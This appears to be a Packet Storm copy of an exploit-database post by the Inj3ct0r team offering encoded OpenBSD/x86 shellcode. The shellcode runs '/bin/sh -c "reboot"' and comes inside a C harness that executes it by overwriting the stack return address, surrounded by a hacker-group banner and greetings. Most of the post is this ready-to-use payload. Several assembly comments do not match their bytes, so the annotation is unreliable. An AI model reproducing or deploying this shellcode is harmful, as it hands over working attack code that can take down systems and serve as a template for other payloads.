178 bytes small sys_execve ('/bin/sh -c "reboot"') OpenBSD/x86 shellcode.
94d36b3d5311044309d26bc0029d3da5204b148e3ef361130577c6b4cdbffb0a1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
//======[ Sh3lL C0d3 ]=========>
/*
###
# Title : OpenBSD/x86 sys_execve ('/bin/sh -c "reboot"') - ShellCode 178 bytes (encoded)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com
# Twitter page : twitter.com/kedans
# platform : OpenBSD/x86
# Type : Shellcode - 178 Bytes (encoded)
##
# <3 Liyan Oz + All UE-Team & I.BackTrack Team <3
###
*/
#include <string.h>
char OpenBSD[]=
"\xEB\x65" // jmpme
"\x5E" // pop %%esi
"\x31\xED" // xor %ebp,%ebp
"\x83\xE1\x01" // and %ecx,0x01
"\x83\xE3\x01" // and %ebx,0x01
"\x66\xBB\xFA\xF7" // mov %bx,0x0F7FA
"\x66\x81\xF3\x48\xF7" // xor %bx,0F748
"\x89\xF7" // mov %edi,%esi
"\x83\xE0\x7F" // and %eax,0x7F
"\xAC" // lods %esi
"\xB1\x80" // mov %cl,0x80
"\xF9" // stc
"\x06" // push %es
"\x74\x23" // je short
"\x60" // pushad
"\x83\xE9\x01" // sub %ecx,0x01
"\x74\x06" // je short
"\xB3\x02" // mov %bl,0x02
"\xF6\xF3" // div %bl
"\xE2\xFC" // loopd short
"\x83\xE0\x01" // and EAX,1
"\x6B\x2F\x02" // imul %ebp,dword %edi,0x02
"\x09\xE8" // or %eax,%ebp
"\xAA" // stos %edi
"\x61" // popad
"\x83\xED\xFF" // sub %ebp,0xFF
"\x83\xFD\x75" // cmp %ebp,0x75
"\x05\x83\xEF\xFF\x31" // add %eax,0x31FFEF83
"\xED" // in %eax,%dx
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\x90" // nop
"\xE2\xBC" // loopd short
"\x83\xEB\x01" // sub %ebp,0x01
"\x74\x07" // je short
"\xEB\xAF" // jmp short
"\xE8\x96\xFF\xFF\xFF" // callme
"\x75\x2E" // jnz short
"\xEB\x29" // jmp short
"\xAA" // stos %edi
"\xA9\xB0\x6D\x71\xA0" // test %eax,0xA0716DB0
"\x20\x28" // and %eax,%ch
"\xAF" // scas dword %edi
"\x3D\x64\xE8\x77\x2B" // cmp %eax,0x2B77E864
"\xEE" // out %dx,%al
"\x76\xA3" // jbe short
"\x60" // pushad
"\xBE\x6F\x71\x3A\x71" // mov %esi,0x713A716F
"\x3E\x3A\xAB\xB0\x34\x20" // cmp %ch,%ebx 0x202034B0
"\x20\x22" // and %edx,%ah
"\xFB" // sti
"\x29\xB2\xEE\x37\xBC\xED" // sub dword ,%edx 0xEDBC37EE,%esi
"\x22\x21" // and %ah,%ecx
"\x75\xA6" // jnz short
"\x60" // pushad
"\x31\x3C\xAC" // xor %esp,%ebp,%edi
"\xB6\x33" // mov %dh,0x33
"\x7D\xBE" // jge short
"\xF4" // hlt
"\x31\x20" // xor %eax,%esp
"\x2A\xF5" // sub %dh,%ch
"\x3C\x67" // cmp %al,0x67
"\xA2\xB2\x68\xB4\xEA" // mov 0xEAB468B2
"\x2C\xEC" // sub 0xEC
"\x20"; // and %eax
main()
{
int *ret;
printf("\n%d\n",sizeof(OpenBSD));
ret=(int*)&ret+2;
(*ret)=(int)OpenBSD;
}
/*
#================[ Exploited By KedAns-Dz * Inj3ct0r * ]=========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > ++ Liyan Oz & Blackrootkit ..all
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# Jago-Dz (sec4ever.com) * Kalashinkov3 * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================
*/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed